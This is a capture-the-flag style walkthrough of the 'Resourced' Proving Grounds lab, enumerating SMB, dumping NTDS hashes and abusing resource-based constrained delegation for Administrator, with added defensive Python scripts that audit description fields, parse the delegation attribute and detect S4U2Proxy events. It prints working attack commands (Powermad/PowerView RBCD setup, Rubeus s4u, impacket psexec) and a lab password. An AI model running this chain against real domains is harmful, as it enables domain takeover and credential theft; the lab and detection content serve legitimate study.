Resourced - Proving Grounds Practice
Enumeration
Nmap
Initial Nmap scan revealed SMB and some common Active Directory ports were open.
SMB Enumeration
nxc did not find a usable SMB null session. However, enum4linux <IP> -a and rpcclient -U '' -N <IP> gave me access to the SMB information available on the target machine.
When you run the querydispinfo command inside rpcclient (or when enum4linux does this automatically), it triggers a specific RPC (Remote Procedure Call) against Windows in the background: SamrQueryDisplayInfo.
This function effectively tells Windows: ‘Give me the list of users, but don’t just provide the names; also provide the details at the Display Information level (which includes descriptions/comments).’
Running enum4linux, or the querydispinfo command in rpcclient, revealed a user description field containing a password.
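The description attribute is readable by every authenticated domain user by default, which is why a password left there is exposed to anyone with a low-privilege account. As an added example (not part of the original writeup), the following script audits a batch of user entries for description text that looks like a credential: a keyword such as "password" or "pwd" followed by a value that mixes letters with digits or symbols, or a bare 32-hex-digit token. The entries and the account names in them are constructed for the example; in practice they would come from an LDAP search for objects with a non-empty description.

```python
import re
from typing import Dict, Iterable, List

# Keyword optionally followed by ':', '=', '-' or 'is', then the candidate value token.
KEYWORD_VALUE = re.compile(
    r"\b(?:password|passwd|passphrase|pwd|pass|secret|credentials?|creds?)\b"
    r"\s*(?:is\b|:|=|-)?\s*(\S+)",
    re.IGNORECASE,
)
# A value is "secret-like" if it is 6+ characters and mixes letters with non-letters.
# This rejects filler words such as "on", "reset" or "expires" that often follow the keyword.
VALUE_LIKE = re.compile(r"^(?=.*[A-Za-z])(?=.*[^A-Za-z])\S{6,}$")
# 32 hex digits in a free-text field is worth a look on its own (possible NT hash).
HASH_LIKE = re.compile(r"\b[0-9a-fA-F]{32}\b")


def classify_description(text: str) -> List[str]:
    """Return the reasons (possibly none) that a description looks like it holds a secret."""
    reasons: List[str] = []
    for match in KEYWORD_VALUE.finditer(text):
        value = match.group(1).rstrip(".,;)")
        if VALUE_LIKE.match(value):
            reasons.append("keyword-adjacent value %r" % value)
    if HASH_LIKE.search(text):
        reasons.append("32-hex-digit token (possible NT hash)")
    return reasons


def audit_descriptions(entries: Iterable[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map sAMAccountName -> reasons for every entry whose description looks sensitive."""
    findings: Dict[str, List[str]] = {}
    for entry in entries:
        reasons = classify_description(entry.get("description") or "")
        if reasons:
            findings[entry["sAMAccountName"]] = reasons
    return findings


# Constructed sample directory entries (accounts, descriptions and hash value are made up).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc_backup", "description": "Backup service account. Password: Autumn2021!Backup"},
    {"sAMAccountName": "j.doe", "description": "Reset password on next login"},
    {"sAMAccountName": "t.smith", "description": "Temp contractor, pwd=Winter2022#"},
    {"sAMAccountName": "m.ross", "description": "Helpdesk lead, ext. 2231"},
    {"sAMAccountName": "a.chen", "description": "Password expires 2025-03-01"},
    {"sAMAccountName": "svc_sql", "description": "Hash on wiki: 0f1e2d3c4b5a69788796a5b4c3d2e1f0"},
]

if __name__ == "__main__":
    for account, reasons in audit_descriptions(SAMPLE_ENTRIES).items():
        print(account, "->", "; ".join(reasons))
```

The check is deliberately conservative: a keyword alone ("Reset password on next login") is not enough, because such notes are common and would drown real findings. Feed it the output of a periodic LDAP query over all user objects and treat every hit as a credential rotation plus a cleanup of the attribute.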
Exploitation
The password was correct; we could authenticate to both SMB and LDAP with it.
First I checked the SMB shares and found a Password Audit share to which the current user had READ access.
It contained NTDS.dit, SYSTEM and SECURITY files.
I mounted the share, because the files were too big to transfer with smbclient:
sudo mount -t cifs '//192.168.128.175/Password Audit' myShare -osec=ntlmv2,domain=resourced.local,username=V.Ventz,password=HotelCalifornia194!
Then, using impacket-secretsdump on those files, I dumped all available hashes.
Then, using nxc, I tested the dumped hashes against the usernames and found a valid hash for the user L.Livingstone.
I then logged in with evil-winrm and obtained a user shell.
Privilege Escalation
Resource-Based Constrained Delegation (RBCD)
Then I ran bloodhound-python and found that the user had GenericAll privileges over the Domain Controller.
So I could either apply the RBCD steps to impersonate Administrator, or change the DC machine account password and log in with it. I decided to apply the RBCD steps.
These are the commands and scripts needed to apply the steps:
# Load Powermad (New-MachineAccount) and PowerView (Get-DomainComputer, Set-DomainObject)
. .\Powermad.ps1
. .\PowerView.ps1
# Create a new machine account that we control
New-MachineAccount -MachineAccount testsystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
# Build a security descriptor that grants that machine account full rights
$ComputerSid = Get-DomainComputer testsystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# Write it to msDS-AllowedToActOnBehalfOfOtherIdentity on the DC, the object we have GenericAll over
$TargetComputer = 'ResourceDC'
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
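The whole attack hinges on one attribute: msDS-AllowedToActOnBehalfOfOtherIdentity on the DC's computer object, which is empty on a healthy domain controller. As an added example (not code from the writeup or from the PowerView/Powermad projects), the script below parses that attribute's binary security descriptor and lists every SID it allows to act on behalf of the computer, so a periodic audit can flag any value that appears on a DC or any trustee that is not on an approved list. The builder mirrors the SDDL string used above (owner BA, one ACCESS_ALLOWED ACE with mask 0xF01FF per trustee) only so the example has input to run on; the domain SID and RID are constructed. In a real audit the raw bytes would be read from LDAP (for instance via ldap3's raw attribute values) rather than built locally.

```python
import struct
from typing import List, Tuple

# Access mask encoded by the SDDL rights string "CCDCLCSWRPWPDTLOCRSDRCWDWO" (all DS object rights).
DS_FULL_CONTROL = 0xF01FF
ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
BUILTIN_ADMINS = "S-1-5-32-544"  # the "BA" owner in the SDDL string above


def sid_to_bytes(sid: str) -> bytes:
    """Encode an 'S-1-...' string as a binary SID."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string: %r" % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(data: bytes, off: int) -> Tuple[str, int]:
    """Decode a binary SID at offset 'off'; return (sid string, bytes consumed)."""
    rev, count = struct.unpack_from("<BB", data, off)
    authority = int.from_bytes(data[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(map(str, subs))), 8 + 4 * count


def build_rbcd_descriptor(trustee_sids: List[str]) -> bytes:
    """Self-relative descriptor like the one Set-DomainObject writes: owner BA, no group,
    no SACL, a DACL with one ACCESS_ALLOWED ACE (full DS rights) per trustee."""
    owner = sid_to_bytes(BUILTIN_ADMINS)
    aces = b""
    for sid in trustee_sids:
        body = struct.pack("<I", DS_FULL_CONTROL) + sid_to_bytes(sid)
        aces += struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYPE, 0, 4 + len(body)) + body
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(trustee_sids), 0) + aces
    owner_off = 20                      # SECURITY_DESCRIPTOR_RELATIVE header is 20 bytes
    dacl_off = owner_off + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         owner_off, 0, 0, dacl_off)
    return header + owner + acl


def rbcd_trustees(sd: bytes) -> List[Tuple[str, int]]:
    """Parse msDS-AllowedToActOnBehalfOfOtherIdentity and return (SID, access mask) for
    every ACCESS_ALLOWED ACE. An empty attribute, the normal state for a DC, yields []."""
    if not sd:
        return []
    if len(sd) < 20:
        raise ValueError("security descriptor too short")
    _rev, _sbz, control, _own, _grp, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []
    _arev, _asbz, _asize, ace_count, _asbz2 = struct.unpack_from("<BBHHH", sd, dacl_off)
    off = dacl_off + 8
    found: List[Tuple[str, int]] = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            (mask,) = struct.unpack_from("<I", sd, off + 4)
            sid, _ = sid_from_bytes(sd, off + 8)
            found.append((sid, mask))
        off += ace_size
    return found


def unexpected_trustees(sd: bytes, approved_sids: List[str]) -> List[str]:
    """SIDs allowed to act on behalf of this computer that are not on the approved list.
    For a domain controller the approved list should normally be empty."""
    return [sid for sid, _ in rbcd_trustees(sd) if sid not in approved_sids]


# Constructed sample: a made-up domain SID and RID standing in for a rogue machine account.
ROGUE_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"
SAMPLE_SD = build_rbcd_descriptor([ROGUE_SID])

if __name__ == "__main__":
    print("trustees:", rbcd_trustees(SAMPLE_SD))
    print("unexpected:", unexpected_trustees(SAMPLE_SD, []))
```

Resolving each returned SID to an account name shows immediately whether the trustee is a legitimate front-end service or a freshly created machine account; pairing this with a check of ms-DS-MachineAccountQuota (which is what lets an ordinary user create the account in the first place) closes the other half of the chain.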
After these, we could simply use Rubeus to obtain a TGS in base64 format. I copied the base64 output and saved it on my attacking machine as a file named kirbi.b64.
.\Rubeus.exe s4u /user:<fake computer name> /rc4:<fake computer password hash> /domain:<domain> /impersonateuser:Administrator /msdsspn:cifs/<target computer> /ptt /nowrap
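On the domain controller this S4U2Proxy request shows up as a Kerberos service ticket event (4769) whose Transited Services field is populated with the delegating service, instead of the usual "-". As an added example (not part of the original writeup), the detection below scans event records for that condition, raises the severity when the impersonated account is privileged, and escalates to critical when the delegating machine account was created (event 4741) shortly beforehand, which is exactly the New-MachineAccount followed by Rubeus sequence shown above. The event records are constructed for the example; field names follow the Windows event message text, and the Transited Services value is assumed to be in "ACCOUNT$@REALM" form.

```python
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Set

PRIVILEGED: Set[str] = {"administrator", "krbtgt"}
CREATION_WINDOW = timedelta(hours=24)

# Constructed sample events: a new machine account, a normal TGS request, the
# S4U2Proxy request for Administrator, and a legitimate delegation by a web front end.
SAMPLE_EVENTS = [
    {"Time": "2024-05-01T10:00:00", "EventID": 4741,
     "NewComputerAccountName": "TESTSYSTEM$", "SubjectUserName": "L.Livingstone"},
    {"Time": "2024-05-01T10:01:00", "EventID": 4769,
     "AccountName": "L.Livingstone@RESOURCED.LOCAL", "ServiceName": "RESOURCEDC$",
     "TransitedServices": "-", "TicketEncryptionType": "0x12",
     "ClientAddress": "::ffff:192.168.128.50"},
    {"Time": "2024-05-01T10:05:00", "EventID": 4769,
     "AccountName": "Administrator@RESOURCED.LOCAL", "ServiceName": "RESOURCEDC$",
     "TransitedServices": "TESTSYSTEM$@RESOURCED.LOCAL", "TicketEncryptionType": "0x17",
     "ClientAddress": "::ffff:192.168.128.50"},
    {"Time": "2024-05-01T11:00:00", "EventID": 4769,
     "AccountName": "websvc@RESOURCED.LOCAL", "ServiceName": "SQL01$",
     "TransitedServices": "WEB01$@RESOURCED.LOCAL", "TicketEncryptionType": "0x12",
     "ClientAddress": "::ffff:192.168.128.20"},
]


def _ts(event: Dict) -> datetime:
    return datetime.fromisoformat(event["Time"])


def detect_s4u2proxy(events: Iterable[Dict], privileged: Set[str] = PRIVILEGED,
                     window: timedelta = CREATION_WINDOW) -> List[Dict]:
    """Flag 4769 events with a populated Transited Services field (S4U2Proxy).

    Severity: medium by default, high if the impersonated user is privileged,
    critical if the delegating account was created (4741) within 'window'."""
    created: Dict[str, datetime] = {}   # machine account name -> creation time
    hits: List[Dict] = []
    for event in sorted(events, key=_ts):
        if event.get("EventID") == 4741:
            created[event["NewComputerAccountName"].upper()] = _ts(event)
            continue
        if event.get("EventID") != 4769:
            continue
        transited = (event.get("TransitedServices") or "-").strip()
        if transited == "-":
            continue                     # ordinary TGS request, no delegation involved
        delegator = transited.split("@")[0].upper()
        user = event["AccountName"].split("@")[0].lower()
        severity = "high" if user in privileged else "medium"
        if delegator in created and _ts(event) - created[delegator] <= window:
            severity = "critical"
        notes = []
        if event.get("TicketEncryptionType") == "0x17":
            notes.append("RC4 ticket")   # consistent with a tool given an NT hash (/rc4)
        hits.append({"time": event["Time"], "impersonated": user, "delegator": delegator,
                     "target": event["ServiceName"], "client": event.get("ClientAddress"),
                     "severity": severity, "notes": notes})
    return hits


if __name__ == "__main__":
    for hit in detect_s4u2proxy(SAMPLE_EVENTS):
        print(hit)
```

Constrained delegation is legitimate in many environments, so the medium-severity hits are mostly noise to be baselined; the combination of a privileged impersonated user and a delegating account that did not exist a day earlier is the signal worth paging on. If directory-service object auditing is enabled, a 5136 event for the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the target computer provides a third correlation point.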
Then I converted the base64 first to a kirbi file and then to a ccache file.
base64 -d kirbi.b64 > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache
and logged in using psexec with the command below:
KRB5CCNAME=ticket.ccache impacket-psexec resourced.local/administrator@ResourceDC.resourced.local -k -no-pass